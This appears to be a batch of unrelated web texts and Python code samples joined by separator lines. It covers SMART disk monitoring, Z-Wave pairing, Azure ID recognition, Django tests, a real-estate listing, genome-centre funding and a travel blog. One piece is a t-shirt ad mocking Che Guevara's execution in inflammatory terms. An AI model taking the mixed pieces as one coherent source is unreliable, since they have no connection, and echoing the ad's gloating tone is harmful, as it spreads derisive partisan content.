def _is_a_virt_host_type_with_virt_uuids(self):
virt_host_type = self._collected_hw_info['virt.host_type']
for no_uuid_platform in self.no_uuid_platforms:
if virt_host_type.find(no_uuid_platform) > -1:
return False
return True
def replace_socket_count_with_dmi(self):
cleanup_info = {}
# cpu topology reporting on xen dom0 machines is wrong. So
# if we are a xen dom0, and we found socket info in dmiinfo,
# replace our normal cpu socket calculation with the dmiinfo one
# we have to do it after the virt data and cpu data collection
if 'virt.host_type' not in self._collected_hw_info:
return cleanup_info
if not self._host_is_xen_dom0():
return cleanup_info
if 'dmi.meta.cpu_socket_count' not in self._collected_hw_info:
return cleanup_info
# Alright, lets munge up cpu socket info based on the dmi info.
socket_count = int(self._collected_hw_info['dmi.meta.cpu_socket_count'])
cleanup_info['cpu.cpu_socket(s)'] = socket_count
if 'cpu.cpu(s)' not in self._collected_hw_info:
return cleanup_info
# And the cores per socket count as well
dmi_cpu_cores_per_cpu = int(self._collected_hw_info['cpu.cpu(s)']) // socket_count
cleanup_info['cpu.core(s)_per_socket'] = dmi_cpu_cores_per_cpu
return cleanup_info
def _host_is_xen_dom0(self):
return self._collected_hw_info['virt.host_type'].find('dom0') > -1
|
The 50th anniversary of Che Guevara's execution shirt. 50% Off!
What better way to celebrate than by wearing a commemorative "¡VIVA LA EJECUCIÓN!" t-shirt. Show how happy you are that he is dead by wearing this to the ballgame, church, grocery store, or school!
Be the first kid on your block with a Dead Che shirt!
The racist, mass-murdering, and homophobic Che, was killed by 2nd Battalion Bolivian Rangers (unofficially as the "Che Hunters") whom were trained & mentored by 7th & 8th Special Forces Group (SFG) on 09 October, 1967. On the left shoulder, you can see a commemorative patch from this Ranger unit whom killed this thug.
Please Note: We currently only have Men's sizes, but we may be adding women's to the mix in the next run.
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: sample_recognize_identity_documents.py
DESCRIPTION:
This sample demonstrates how to recognize fields from an identity document.
See fields found on identity documents here:
https://aka.ms/formrecognizer/iddocumentfields
USAGE:
python sample_recognize_identity_documents.py
Set the environment variables with your own values before running the sample:
1) AZURE_FORM_RECOGNIZER_ENDPOINT - the endpoint to your Cognitive Services resource.
2) AZURE_FORM_RECOGNIZER_KEY - your Form Recognizer API key
"""
import os
class RecognizeIdDocumentsSample(object):
def recognize_identity_documents(self):
path_to_sample_forms = os.path.abspath(os.path.join(os.path.abspath(__file__),
"..", "./sample_forms/id_documents/license.jpg"))
# [START recognize_identity_documents]
from azure.core.credentials import AzureKeyCredential
from azure.ai.formrecognizer import FormRecognizerClient
endpoint = os.environ["AZURE_FORM_RECOGNIZER_ENDPOINT"]
key = os.environ["AZURE_FORM_RECOGNIZER_KEY"]
form_recognizer_client = FormRecognizerClient(
endpoint=endpoint, credential=AzureKeyCredential(key)
)
with open(path_to_sample_forms, "rb") as f:
poller = form_recognizer_client.begin_recognize_identity_documents(identity_document=f)
id_documents = poller.result()
for idx, id_document in enumerate(id_documents):
print("--------Recognizing ID document #{}--------".format(idx+1))
first_name = id_document.fields.get("FirstName")
if first_name:
print("First Name: {} has confidence: {}".format(first_name.value, first_name.confidence))
last_name = id_document.fields.get("LastName")
if last_name:
print("Last Name: {} has confidence: {}".format(last_name.value, last_name.confidence))
document_number = id_document.fields.get("DocumentNumber")
if document_number:
print("Document Number: {} has confidence: {}".format(document_number.value, document_number.confidence))
dob = id_document.fields.get("DateOfBirth")
if dob:
print("Date of Birth: {} has confidence: {}".format(dob.value, dob.confidence))
doe = id_document.fields.get("DateOfExpiration")
if doe:
print("Date of Expiration: {} has confidence: {}".format(doe.value, doe.confidence))
sex = id_document.fields.get("Sex")
if sex:
print("Sex: {} has confidence: {}".format(sex.value, sex.confidence))
address = id_document.fields.get("Address")
if address:
print("Address: {} has confidence: {}".format(address.value, address.confidence))
country_region = id_document.fields.get("CountryRegion")
if country_region:
print("Country/Region: {} has confidence: {}".format(country_region.value, country_region.confidence))
region = id_document.fields.get("Region")
if region:
print("Region: {} has confidence: {}".format(region.value, region.confidence))
# [END recognize_identity_documents]
if __name__ == '__main__':
sample = RecognizeIdDocumentsSample()
sample.recognize_identity_documents()
|
Designed specifically with the small team in mind. This coaching program enables small teams to double, triple or quadruple their production, market share and leverage. Ideal for a team of two up to teams who have not yet hired middle management. The Small Team Growth package supports both the team leader with twice monthly calls as well as the entire team on several calls per week.
|
import datetime
import uuid
import mock
from django.utils import timezone
from django.core import mail
from rest_framework import status
from rest_framework.test import APITestCase
from cla_common.constants import CASE_SOURCE
from cla_eventlog.models import Log
from checker.serializers import CaseSerializer
from core.tests.mommy_utils import make_recipe
from core.tests.test_base import SimpleResourceAPIMixin
from legalaid.models import Case, PersonalDetails
from legalaid.tests.views.test_base import CLACheckerAuthBaseApiTestMixin
from call_centre.tests.test_utils import CallCentreFixedOperatingHours
class BaseCaseTestCase(
CLACheckerAuthBaseApiTestMixin, CallCentreFixedOperatingHours, SimpleResourceAPIMixin, APITestCase
):
LOOKUP_KEY = "reference"
API_URL_BASE_NAME = "case"
RESOURCE_RECIPE = "legalaid.case"
def make_resource(self):
return None
def assertCaseResponseKeys(self, response):
self.assertItemsEqual(
response.data.keys(),
[
"eligibility_check",
"personal_details",
"reference",
"requires_action_at",
"callback_window_type",
"adaptation_details",
"thirdparty_details",
],
)
def assertPersonalDetailsEqual(self, data, obj):
if data is None or obj is None:
self.assertEqual(data, obj)
else:
for prop in ["title", "full_name", "postcode", "street", "mobile_phone", "home_phone"]:
self.assertEqual(unicode(getattr(obj, prop)), data[prop])
def assertCaseEqual(self, data, case):
self.assertEqual(case.reference, data["reference"])
self.assertEqual(unicode(case.eligibility_check.reference), data["eligibility_check"])
self.assertPersonalDetailsEqual(data["personal_details"], case.personal_details)
self.assertEqual(Case.objects.count(), 1)
case = Case.objects.first()
self.assertEqual(case.source, CASE_SOURCE.WEB)
def get_personal_details_default_post_data(self):
return {
"title": "MR",
"full_name": "John Doe",
"postcode": "SW1H 9AJ",
"street": "102 Petty France",
"mobile_phone": "0123456789",
"home_phone": "9876543210",
}
class CaseTestCase(BaseCaseTestCase):
def test_methods_not_allowed(self):
"""
Ensure that we can't POST, PUT or DELETE
"""
# LIST
self._test_delete_not_allowed(self.list_url)
# CREATE
def test_create_no_data(self):
"""
CREATE should raise validation error when data is empty
"""
response = self.client.post(self.list_url, data={}, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertItemsEqual(response.data.keys(), ["personal_details"])
self.assertEqual(Case.objects.count(), 0)
def test_create_with_data(self):
check = make_recipe("legalaid.eligibility_check")
data = {
"eligibility_check": unicode(check.reference),
"personal_details": self.get_personal_details_default_post_data(),
}
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCaseResponseKeys(response)
self.assertCaseEqual(
response.data,
Case(
reference=response.data["reference"],
eligibility_check=check,
personal_details=PersonalDetails(**data["personal_details"]),
),
)
# test that the Case is in the db and created by 'web' user
self.assertEqual(Case.objects.count(), 1)
case = Case.objects.first()
self.assertEqual(case.created_by.username, "web")
# test that the log is in the db and created by 'web' user
self.assertEqual(Log.objects.count(), 1)
log = Log.objects.first()
self.assertEqual(log.created_by.username, "web")
# no email sent
self.assertEquals(len(mail.outbox), 0)
def _test_method_in_error(self, method, url):
"""
Generic method called by 'create' and 'patch' to test against validation
errors.
"""
invalid_uuid = str(uuid.uuid4())
data = {
"eligibility_check": invalid_uuid,
"personal_details": {
"title": "1" * 21,
"full_name": None,
"postcode": "1" * 13,
"street": "1" * 256,
"mobile_phone": "1" * 21,
"home_phone": "1" * 21,
},
}
method_callable = getattr(self.client, method)
response = method_callable(url, data, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
errors = response.data
self.assertItemsEqual(errors.keys(), ["eligibility_check", "personal_details"])
self.assertEqual(errors["eligibility_check"], [u"Object with reference=%s does not exist." % invalid_uuid])
self.assertItemsEqual(
errors["personal_details"],
[
{
"title": [u"Ensure this value has at most 20 characters (it has 21)."],
"postcode": [u"Ensure this value has at most 12 characters (it has 13)."],
"street": [u"Ensure this value has at most 255 characters (it has 256)."],
"mobile_phone": [u"Ensure this value has at most 20 characters (it has 21)."],
"home_phone": [u"Ensure this value has at most 20 characters (it has 21)."],
}
],
)
def test_create_in_error(self):
self._test_method_in_error("post", self.list_url)
def test_cannot_create_with_other_reference(self):
"""
Cannot create a case passing an eligibility check reference already assigned
to another case
"""
# create a different case
case = make_recipe("legalaid.case")
data = {
"eligibility_check": unicode(case.eligibility_check.reference),
"personal_details": self.get_personal_details_default_post_data(),
}
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertDictEqual(
response.data, {"eligibility_check": [u"Case with this Eligibility check already exists."]}
)
def test_case_serializer_with_dupe_eligibility_check_reference(self):
case = make_recipe("legalaid.case")
data = {
u"eligibility_check": case.eligibility_check.reference,
u"personal_details": self.get_personal_details_default_post_data(),
}
serializer = CaseSerializer(data=data)
self.assertFalse(serializer.is_valid())
self.assertDictEqual(
serializer.errors, {"eligibility_check": [u"Case with this Eligibility check already exists."]}
)
class CallMeBackCaseTestCase(BaseCaseTestCase):
@property
def _default_dt(self):
if not hasattr(self, "__default_dt"):
self.__default_dt = datetime.datetime(2015, 3, 30, 10, 0, 0, 0).replace(tzinfo=timezone.utc)
return self.__default_dt
def test_create_with_callmeback(self):
self.assertEquals(len(mail.outbox), 0)
check = make_recipe("legalaid.eligibility_check")
data = {
"eligibility_check": unicode(check.reference),
"personal_details": self.get_personal_details_default_post_data(),
"requires_action_at": self._default_dt.isoformat(),
}
with mock.patch(
"cla_common.call_centre_availability.current_datetime",
return_value=datetime.datetime(2015, 3, 23, 10, 0, 0, 0),
):
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCaseResponseKeys(response)
case = Case.objects.first()
self.assertEqual(case.requires_action_at, self._default_dt)
self.assertEqual(case.callback_attempt, 1)
self.assertEqual(case.outcome_code, "CB1")
self.assertEqual(case.source, CASE_SOURCE.WEB)
self.assertEqual(case.log_set.count(), 2)
self.assertEqual(case.log_set.filter(code="CB1").count(), 1)
log = case.log_set.get(code="CB1")
self.assertEqual(
log.notes,
"Callback scheduled for %s - %s. "
% (
timezone.localtime(self._default_dt).strftime("%d/%m/%Y %H:%M"),
(timezone.localtime(self._default_dt) + datetime.timedelta(minutes=30)).strftime("%H:%M"),
),
)
_dt = timezone.localtime(self._default_dt)
expected_sla_72h = datetime.datetime(2015, 4, 7, 13, 30, 0, 0)
self.assertDictEqual(
log.context,
{
"requires_action_at": _dt.isoformat(),
"sla_120": (_dt + datetime.timedelta(minutes=120)).isoformat(),
"sla_480": (_dt + datetime.timedelta(hours=8)).isoformat(),
"sla_15": (_dt + datetime.timedelta(minutes=15)).isoformat(),
"sla_30": (_dt + datetime.timedelta(minutes=30)).isoformat(),
"sla_72h": timezone.make_aware(expected_sla_72h, _dt.tzinfo).isoformat(),
},
)
# checking email
self.assertEquals(len(mail.outbox), 1)
def test_create_should_ignore_outcome_code(self):
"""
Here only to check backward incompatibility
"""
check = make_recipe("legalaid.eligibility_check")
data = {
"eligibility_check": unicode(check.reference),
"personal_details": self.get_personal_details_default_post_data(),
"requires_action_at": self._default_dt.isoformat(),
"outcome_code": "TEST",
}
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCaseResponseKeys(response)
case = Case.objects.first()
self.assertNotEqual(case.outcome_code, "TEST")
|
We frequently receive enquiries from the media wanting to interview adoptive families and prospective adopters.
We are looking for all types of stories from prospective adopters at the start of the process to those who are several years into an adoption.
Your story can be a positive one or focus on some of the challenges you've faced as an adopter.
Sharing your story is a great way to raise awareness about the joys and challenges of adoption to a wider audience. Telling the media about what it's like to go through the adoption process first hand really helps us by giving our media work credibility and human interest.
The contribution media volunteers make to our work is extremely valuable and we do everything we can to ensure you feel comfortable and confident talking to the media.
|
from unittest import TestCase
import numpy as np
from toybox.tools import *
class TestCheckPoint(TestCase):
def test_valid_point(self):
point = (2, 3)
check_point(point)
def test_valid_point_with_intensity(self):
point = (2, 3, 1.)
check_point(point)
def test_check_3d_point(self):
point = (0., 1., 0., 1.)
with self.assertRaises(ValueError):
check_point(point)
def test_check_invalid_point(self):
point = (0., 'bad value')
with self.assertRaises(ValueError):
check_point(point)
class TestCheckPoints(TestCase):
def test_single_point(self):
point = ((2, 3, None),)
check_points(point)
class TestSortPoints(TestCase):
def test_sort_points(self):
points = np.array([
[1., 1.],
[2., 2.],
[1., 2.],
])
result = sort_points(points)
np.testing.assert_array_almost_equal(result, points)
def test_sort_points_with_zero(self):
points = np.array([
[1., 0.],
[0., 0.]
])
expected = np.array([
[0., 0.],
[1., 0.]
])
result = sort_points(points)
np.testing.assert_array_almost_equal(result, expected)
|
As you all know, Motorola manufactures Droid phones for Verizon. So with all the hype regarding the highly customizable Moto X, we were eager to know what’s next from Moto.
And now there is an official clue about the gen next Moto product.
Verizon, via its DroidLanding Twitter account, has given away some sketchy details of a possible new gen Motorola device that would come riding the carrier.
And if we are considering the current hints available before us, the next Droid device could be a Motorola tablet. We have not much information regarding the next step from the handset manufacturer at the moment, though.
Moto X is at present the best option for somebody looking to by a smart phone in terms of usability and customizability. The impressive device had come with scratch resistant Corning Gorilla Glass and a dual core Snapdragon Qualcomm processor.
The powerful packed handset sports AMOLED display and runs Android version 4.3 OS. Moto X not only leads other smart phones of its range in customization, but also in performance.
We now need to think that the rumored Moto DROID device will be having some nice features to please the user.
Verizon has been using DroidLanding as its online promotional medium for some time. Now it is teasing the device in the form of a four minute video, which give clues about the forthcoming tablet.
If the Motorola DROID tablet from Verizon is going to be true, we need to look forward to a smart and attractive-featured slate to come our way.
|
#!/usr/bin/env python
#
# Script to get SMART DATA from a FreeBSD based system (ie FreeNAS). Write to csv. Can be called from munin plugin SSH__FreeNAS_HDDTemp
#
'''Import SATA SMART DATA'''
#import handy commands
import os
import sys
import re
import time
import datetime
import csv
smart_device_table=[]
smart_devices = []
current_unix_time = int(time.time())
#just to keep it quiet in testing
def fnGetSmartData():
smart_device_info=[]
#get list of devices in system
smart_list_devices_raw=os.popen("smartctl --scan").read().split('\n')
#print smart_list_devices_raw
#
for index, line in enumerate(smart_list_devices_raw):
line=line.split(' ')
if index <len(smart_list_devices_raw)-1:
#print "index:", index, "line", line[0],line[5]
append_data = line[0],line[5]
smart_devices.append(append_data)
#get data for each device detected
#
#SMART 5 Reallocated_Sector_Count.
#SMART 187eported_Uncorrectable_Errors.
#SMART 188Command_Timeout.
#SMART 197 urrent_Pending_Sector_Count.
#SMART 198 Offline_Uncorrectable.
#get name, serial number etc
for slashdevid in smart_devices:
device_model = "-1"
device_serial = "-2"
device_health = "-3"
device_firmware_version = "-4"
device_capacity = "-5"
device_hrs = "-6"
device_tempC = "-7"
device_sscount = "-8"
device_5reallocate = "-05"
device_198OfflineUncorrectable = "-198"
device_187ReportedUncorrectableErrors = "-187"
device_188CommandTimeout = "-188"
device_197CurrentPendingSector = "-197"
#print "slash", slashdevid
#print "slash0", slashdevid[0]
slashid=slashdevid[0]
#add in slashid rather tahn ada1 to make this work!
smart_device_data=os.popen("smartctl -a " + slashdevid[0] ).read().split('\n')
#print "raw", smart_device_data
#print "rawline:", smart_device_name
#scan through smart_device_data for name field
for index, item in enumerate(smart_device_data):
#print 'raw item', item
if "Device Model" in item:
device_model = item[18:]
#print "device_model", device_model
if "Firmware Version:" in item:
device_firmware_version = item[17:]
#print "device firmware:", device_firmware_version
if "Serial" in item:
device_serial = item[17:]
#print "device serial:", device_serial
if "SMART overall-health self-assessment" in item:
device_health = item.split (":")
device_health = device_health[1]
#print "Smart health", device_health
if "User Capacity" in item:
device_capacity = item.split("[")
device_capacity = device_capacity[1].replace("]", "")
#print "device_capacity", device_capacity
if "Power_On_Hours" in item:
device_hrs = item.split(" ")
device_hrs = device_hrs[43:][0]
#print "Power on hrs", device_hrs
if "4 Start_Stop_Count" in item:
device_sscount = item.split(" ")
device_sscount = device_sscount[-1]
#print "Start_stop_Count", device_sscount
#THE FOLLOWING ARE KEY INDICATORS OF FAILURE (or recorded cause it can be)
#https://www.backblaze.com/blog/hard-drive-smart-stats/
#SMART 5 - Reallocated sector count
if "5 Reallocate" in item:
device_5reallocate = item.split(" ")
device_5reallocate = device_5reallocate[-1]
#print "Reallocated", device_5reallocate
#SMART 187 Reported Uncorrectable Errors
if item.startswith("187 Reported"):
device_187ReportedUncorrectableErrors = item.split(" ")
device_187ReportedUncorrectableErrors = device_187ReportedUncorrectableErrors[-1]
#print "Reported Uncorrectable errors (187):", device_187ReportedUncorrectableErrors
#SMART 188 Command Timeout
if item.startswith("188 Command"):
device_188CommandTimeout = item.split(" ")
device_188CommandTimeout = device_188CommandTimeout[-1]
#print "Command Timeout (188):", device_188CommandTimeout
#SMART 197 Current Pending Sector Count
if item.startswith("197 Current_Pending_Sector"):
device_197CurrentPendingSector = item.split(" ")
device_197CurrentPendingSector = device_197CurrentPendingSector[-1]
#print "Current Pending Sector (197):", device_197CurrentPendingSector
if "Temperature_Celsius" in item:
device_tempC = item.split("(")
device_tempC = device_tempC[0]
device_tempC = device_tempC.split(" ")
device_tempC = device_tempC[-2]
#print "Temperature_Celsius", device_tempC
if "198 Offline_Uncorrectable" in item:
device_198OfflineUncorrectable = item.split(" ")
device_198OfflineUncorrectable = device_198OfflineUncorrectable[-1]
#print "Offline_Uncorrectable (198)", device_198OfflineUncorrectable
# Need to think about device statistics - ie GP04.
# - Device bytes written (logical blocks written/read to TB)
# - Device io commands completed, Lifetime, per hr average.
append_data = slashdevid[0],device_model, device_serial, device_health, device_firmware_version, device_capacity, device_hrs, device_tempC, device_sscount, device_5reallocate, device_187ReportedUncorrectableErrors,device_188CommandTimeout,device_198OfflineUncorrectable,
smart_device_info.append(append_data)
return smart_device_info
def fnExportToCSV(smart_device_table,filename):
#export pool data
with open (filename, 'w') as csvfile:
writeout = csv.writer(csvfile, quoting=csv.QUOTE_NONE)
for line in smart_device_table:
writeout.writerow(line)
#Run the bits we need:
smart_device_table = fnGetSmartData()
fnExportToCSV(smart_device_table,"/root/temp/monitoring/smartsatadata.txt")
|
I was searching for a Property and found this listing (MLS® #O5737109). Please send me more information regarding 234 Afton Sq #103, Altamonte Springs, FL, 32714. Thank you!
I'd like to request a showing of 234 Afton Sq #103, Altamonte Springs, FL, 32714 (MLS® #O5737109). Thank you!
234 Afton Sq #103 is located in the Oasis At Pearl Lake A Condo neighborhood in Altamonte Springs, FL. This residential property for sale is currently being offered at $78,000. Built in 1988 this 1 bedroom, 1.00 bathroom Central Florida residential property has been listed on RealtyInOrlando.com for 83 days. 234 Afton Sq #103 is priced at $116 Per Square Foot, and is situated on 0.01 acres of land. Homeowner association fees in Oasis At Pearl Lake A Condo are $204 per month. Please contact your local Realtor® for more information on 234 Afton Sq #103, Altamonte Springs, Florida 32714. Property Listing Reference: MLS number: O5737109.
|
#!/usr/bin/python3
# Copyright 2016 Robert Muth <robert@muth.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
Example command line tool for pairing/unpairing
"""
import argparse
# python import
import logging
import sys
import time
from typing import Tuple
from pyzwaver import zwave as z
from pyzwaver.command import StringifyCommand
from pyzwaver.command_translator import CommandTranslator
from pyzwaver.controller import Controller
from pyzwaver.driver import Driver, MakeSerialDevice
from pyzwaver.node import Nodeset
from pyzwaver.zmessage import ControllerPriority
XMIT_OPTIONS_NO_ROUTE = (z.TRANSMIT_OPTION_ACK |
z.TRANSMIT_OPTION_EXPLORE)
XMIT_OPTIONS = (z.TRANSMIT_OPTION_ACK |
z.TRANSMIT_OPTION_AUTO_ROUTE |
z.TRANSMIT_OPTION_EXPLORE)
XMIT_OPTIONS_SECURE = (z.TRANSMIT_OPTION_ACK |
z.TRANSMIT_OPTION_AUTO_ROUTE)
class TestListener(object):
"""
Demonstrates how to hook into the stream of messages
sent to the controller from other nodes
"""
def __init__(self):
pass
def put(self, n, ts, key, values):
name = "@NONE@"
if key[0] is not None:
name = StringifyCommand(key)
logging.warning("RECEIVED [%d]: %s - %s", n, name, values)
class NodeUpdateListener(object):
def put(self, n, _ts, key, values):
print("RECEIVED ", n, key, values)
def ControllerEventCallback(action, event, node):
print(action, event, node)
def InitController(args, update_routing=False) -> Tuple[Driver, Controller]:
logging.info("opening serial: [%s]", args.serial_port)
device = MakeSerialDevice(args.serial_port)
driver = Driver(device)
controller = Controller(driver, pairing_timeout_secs=args.pairing_timeout_sec)
controller.Initialize()
controller.WaitUntilInitialized()
if update_routing:
controller.UpdateRoutingInfo()
driver.WaitUntilAllPreviousMessagesHaveBeenHandled()
print(controller.StringBasic())
if update_routing:
print(controller.StringRoutes())
# print(controller.props.StringApis())
return driver, controller
def cmd_neighbor_update(args):
driver, controller = InitController(args)
for n in controller.nodes:
if n == controller.GetNodeId(): continue
if n in controller.failed_nodes: continue
controller.NeighborUpdate(n, ControllerEventCallback)
driver.WaitUntilAllPreviousMessagesHaveBeenHandled()
driver.Terminate()
def cmd_pair(args):
driver, controller = InitController(args)
controller.StopAddNodeToNetwork(ControllerEventCallback)
controller.AddNodeToNetwork(ControllerEventCallback)
controller.StopAddNodeToNetwork(ControllerEventCallback)
driver.Terminate()
def cmd_secure_pair(args):
# experimental - make sure you enable security in node.py
driver, controller = InitController(args)
translator = CommandTranslator(driver)
translator.AddListener(TestListener())
nodeset = Nodeset(translator, controller.GetNodeId())
controller.StopAddNodeToNetwork(ControllerEventCallback)
time.sleep(1.0)
controller.AddNodeToNetwork(ControllerEventCallback)
controller.StopAddNodeToNetwork(ControllerEventCallback)
time.sleep(5.0)
# driver.Terminate()
def cmd_unpair(args):
driver, controller = InitController(args)
controller.StopRemoveNodeFromNetwork(None)
time.sleep(1.0)
controller.RemoveNodeFromNetwork(ControllerEventCallback)
controller.StopRemoveNodeFromNetwork(None)
time.sleep(1.0)
driver.Terminate()
def cmd_hard_reset(args):
driver, controller = InitController(args)
controller.SetDefault()
driver.Terminate()
def cmd_controller_details(args):
driver, controller = InitController(args, True)
driver.Terminate()
def cmd_set_basic_multi(args):
driver, controller = InitController(args, True)
translator = CommandTranslator(driver)
logging.info("sending command to %s", args.node)
translator.SendMultiCommand(args.node,
z.Basic_Set,
{"level": args.level},
ControllerPriority(),
XMIT_OPTIONS
)
driver.Terminate()
def cmd_get_basic(args):
driver, controller = InitController(args, True)
translator = CommandTranslator(driver)
translator.AddListener(NodeUpdateListener())
for n in args.node:
translator.SendCommand(n,
z.Basic_Get,
{},
ControllerPriority(),
XMIT_OPTIONS)
time.sleep(2)
driver.Terminate()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--verbosity", type=int, default=40,
help="increase output verbosity")
parser.add_argument("--pairing_timeout_sec", type=int, default=30,
help="(un)pairing timeout")
parser.add_argument("--serial_port", type=str, default="/dev/ttyUSB0",
help='The USB serial device representing the Z-Wave controller stick. '
'Common settings are: dev/ttyUSB0, dev/ttyACM0')
subparsers = parser.add_subparsers(help="sub-commands")
s = subparsers.add_parser("pair", help="Pair a Z-wave node")
s.set_defaults(func=cmd_pair)
s = subparsers.add_parser("secure_pair", help="Securely pair a Z-wave node")
s.set_defaults(func=cmd_secure_pair)
s = subparsers.add_parser("unpair", help="Unpair a Z-wave node")
s.set_defaults(func=cmd_unpair)
s = subparsers.add_parser("hard_reset", help="Factory reset Z-wave controller")
s.set_defaults(func=cmd_hard_reset)
s = subparsers.add_parser("controller_details", help="Show Z-wave controller details")
s.set_defaults(func=cmd_controller_details)
s = subparsers.add_parser("set_basic_multi", help="Send mutlicast BasicSet command")
s.set_defaults(func=cmd_set_basic_multi)
s.add_argument("--level", type=int, default=99, help="level to set")
s.add_argument('--node', type=int, nargs='+', help="dest node(s) - separate multiple nodes with spaces")
s = subparsers.add_parser("get_basic", help="Run BasicGet command")
s.set_defaults(func=cmd_get_basic)
s.add_argument('--node', type=int, nargs='+', help="dest node(s) - separate multiple nodes with spaces")
s = subparsers.add_parser("neighbor_update", help="Update Node Neighborhoods")
s.set_defaults(func=cmd_neighbor_update)
args = parser.parse_args()
logging.basicConfig(level=args.verbosity)
if "func" in args:
print(args)
args.func(args)
else:
# we should not reach here but there seems to be a bug
parser.error("No command specified - try -h option")
return 0
if __name__ == "__main__":
sys.exit(main())
|
Based on an application by Denmark’s Ministry of Health, the Board of Directors of the Novo Nordisk Foundation has approved a framework grant of DKK 990 million (€133 million) over 4.5 years for establishing and operating the infrastructure of the National Genome Centre. The Foundation has awarded DKK 102 million of this to begin setting up the Centre’s data and information technology unit immediately in 2019.
In addition, the Foundation has awarded a grant of DKK 30 million to enable the Ministry to involve leading experts from Denmark and elsewhere in preparing a resilient project plan for establishing and operating the infrastructure of the Centre.
Hear more about the Centre and other exciting precision medicine Initiatives in the Nordic Region at the 3rd Annual Nordic Precision Medicine Forum. Click here to see more and register.
The goal is for Denmark to become one of the leading countries in this field, improving both the treatment and prevention of disease.
As a result of the initiative, genome sequencing facilities will be established in Aarhus and in Copenhagen as specified in the Ministry’s application. The Ministry expects that about 60,000 people will undergo whole-genome sequencing in the first 5 years of the Centre. The sequencing and data processing will be based at public institutions, and the Centre will give highest priority to security in storing and using the data in a central national database. An interpretation unit will support doctors in using the data to benefit patients.
The National Genome Centre is an independent organization under Denmark’s Ministry of Health. The Centre will be a hub for the visionary and balanced development of genomic medicine in Denmark. The Government of Denmark allocated DKK 100 million (€13 million) in the 2017 Finance Act to co-finance the work with personalized medicine for 2017–2020.
The Centre’s task is to develop and operate a unified nationwide infrastructure for processing genetic information.
An important goal for the Centre is to collaborate with the healthcare system in all five administrative regions to create the basis for improving diagnosis and targeted treatment to benefit each individual patient.
|
import cStringIO as StringIO
import os
import zipfile
class ZipStream(file):
def __init__(self, dir_path):
self.dir_path = dir_path
self.pos = 0
self.buff_pos = 0
self.zf = zipfile.ZipFile(self, 'w', zipfile.ZIP_DEFLATED, allowZip64=True)
self.buff = StringIO.StringIO()
self.file_list = self.getFileList()
def getFileList(self):
for root, dirs, files in os.walk(self.dir_path):
for file in files:
file_path = root + "/" + file
relative_path = os.path.join(os.path.relpath(root, self.dir_path), file)
yield file_path, relative_path
self.zf.close()
def read(self, size=60 * 1024):
for file_path, relative_path in self.file_list:
self.zf.write(file_path, relative_path)
if self.buff.tell() >= size:
break
self.buff.seek(0)
back = self.buff.read()
self.buff.truncate(0)
self.buff.seek(0)
self.buff_pos += len(back)
return back
def write(self, data):
self.pos += len(data)
self.buff.write(data)
def tell(self):
return self.pos
def seek(self, pos, whence=0):
if pos >= self.buff_pos:
self.buff.seek(pos - self.buff_pos, whence)
self.pos = pos
def flush(self):
pass
if __name__ == "__main__":
zs = ZipStream(".")
out = open("out.zip", "wb")
while 1:
data = zs.read()
print("Write %s" % len(data))
if not data:
break
out.write(data)
out.close()
|
Between my last post and this one, we traveled to Cincinnati and back.
Getting there was more of an adventure than normal. I woke up at 5 (to get to the airport by 6:30). But, around 5:30 got a text message that the flight was delayed by 5 hours (until 1:00pm). Not very much fun, but not canceled, and then we decided to go back to sleep. Right around 8:30 we get another text message…. flight leaves at 11am. This does not give us much time. We scramble out of bed, head to the offsite parking, and made it to the airport about 9:50, plenty of time.
The rest of the time was just visiting with family, we had a great time, but of course the visits are never long enough.
The was back was much easier – we left on time and landed in Seattle 45 minutes early.
Our next trip will be to Alaska and then we’ll be back in Cincinnati in July.
|
# Copyright (c) 2013-2015 University Corporation for Atmospheric Research/Unidata.
# Distributed under the terms of the MIT License.
# SPDX-License-Identifier: MIT
"""
================
NCSS Time Series
================
Use Siphon to query the NetCDF Subset Service for a timeseries.
"""
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
from netCDF4 import num2date
from siphon.catalog import TDSCatalog
###########################################
# First we construct a TDSCatalog instance pointing to our dataset of interest, in
# this case TDS' "Best" virtual dataset for the GFS global 0.5 degree collection of
# GRIB files. We see this catalog contains a single dataset.
best_gfs = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GFS/'
'Global_0p5deg/catalog.xml?dataset=grib/NCEP/GFS/Global_0p5deg/Best')
print(best_gfs.datasets)
###########################################
# We pull out this dataset and get the NCSS access point
best_ds = best_gfs.datasets[0]
ncss = best_ds.subset()
###########################################
# We can then use the `ncss` object to create a new query object, which
# facilitates asking for data from the server.
query = ncss.query()
###########################################
# We construct a query asking for data corresponding to latitude 40N and longitude 105W,
# for the next 7 days. We also ask for NetCDF version 4 data, for the variable
# 'Temperature_isobaric', at the vertical level of 100000 Pa (approximately surface).
# This request will return all times in the range for a single point. Note the string
# representation of the query is a properly encoded query string.
now = datetime.utcnow()
query.lonlat_point(-105, 40).vertical_level(100000).time_range(now, now + timedelta(days=7))
query.variables('Temperature_isobaric').accept('netcdf')
###########################################
# We now request data from the server using this query. The `NCSS` class handles parsing
# this NetCDF data (using the `netCDF4` module). If we print out the variable names, we
# see our requested variables, as well as a few others (more metadata information)
data = ncss.get_data(query)
list(data.variables.keys())
###########################################
# We'll pull out the temperature and time variables.
temp = data.variables['Temperature_isobaric']
